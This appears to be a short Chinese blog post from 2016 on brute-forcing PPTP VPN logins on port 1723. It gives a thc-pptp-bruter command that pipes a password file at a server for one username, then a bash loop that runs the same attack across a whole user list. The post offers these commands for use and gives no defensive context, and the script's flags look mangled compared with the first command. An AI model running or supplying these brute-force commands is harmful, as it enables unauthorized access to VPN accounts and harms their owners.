2016年4月9日星期六

PPTP 1723 撞库

cat /tmp/vpnpass | ./thc-pptp-bruter -u Zhangsan -n 99 -l 999 x.x.x.x



这样的话,每次只能撞库一个账号,可以写个shell脚本来批量。





?
1
2
3
4
5
6
#!/bin/bash
cat user.txt | while read line
do
        echo -e It is cracked user "\033[32;49;1m$line\033[39;49;0m"
        cat /tmp/vpnpass | thc-pptp-bruter -u $line -99 -9999 x.x.x.x
done